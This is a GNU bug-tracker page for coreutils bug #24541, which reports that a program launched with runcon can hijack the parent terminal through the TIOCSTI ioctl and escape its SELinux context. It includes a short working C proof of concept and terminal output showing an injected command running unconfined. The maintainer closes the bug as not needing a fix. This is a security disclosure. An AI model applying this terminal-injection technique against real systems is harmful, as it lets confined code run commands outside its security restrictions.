GNU bug report logs - #24541
runcon tty hijacking via TIOCSTI ioctl


Package: coreutils;

Reported by: up201407890 <at> alunos.dcc.fc.up.pt

Date: Sun, 25 Sep 2016 15:58:02 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.


From: help-debbugs <at> gnu.org (GNU bug Tracking System)
To: Paul Eggert <eggert <at> cs.ucla.edu>
Cc: tracker <at> debbugs.gnu.org
Subject: bug#24541: closed (runcon tty hijacking via TIOCSTI ioctl)
Date: Mon, 26 Sep 2016 15:54:02 +0000
[Message part 1 (text/plain, inline)]
Your message dated Mon, 26 Sep 2016 08:53:34 -0700
with message-id <cd8c8f0b-4aee-e224-8816-6e835eee2bac <at> cs.ucla.edu>
and subject line Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
has caused the debbugs.gnu.org bug report #24541,
regarding runcon tty hijacking via TIOCSTI ioctl
to be marked as done.

(If you believe you have received this mail in error, please contact
help-debbugs <at> gnu.org.)


-- 
24541: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=24541
GNU Bug Tracking System
Contact help-debbugs <at> gnu.org with problems
[Message part 2 (message/rfc822, inline)]
From: up201407890 <at> alunos.dcc.fc.up.pt
To: bug-coreutils <at> gnu.org
Subject: runcon tty hijacking via TIOCSTI ioctl
Date: Sun, 25 Sep 2016 13:39:55 +0200
When executing a program via the runcon utility, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
execute arbitrary commands without the SELinux security context.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ runcon -t sandbox_t ./test
id
uid=1000 gid=1000 groups=1000  
context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
$ id   <--- did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Thanks,
Federico Bento.




[Message part 3 (message/rfc822, inline)]
From: Paul Eggert <eggert <at> cs.ucla.edu>
To: up201407890 <at> alunos.dcc.fc.up.pt
Cc: 24541-done <at> debbugs.gnu.org, SE-Linux <SELinux <at> tycho.nsa.gov>
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 08:53:34 -0700
> "I don't think we need to fix this for runcon, as it isn't a
> sandboxing tool like sandbox, and the loss of job control would likely
> be much more noticeable for runcon."

Thanks, closing the debbugs bug report.



This bug report was last modified 7 years and 270 days ago.
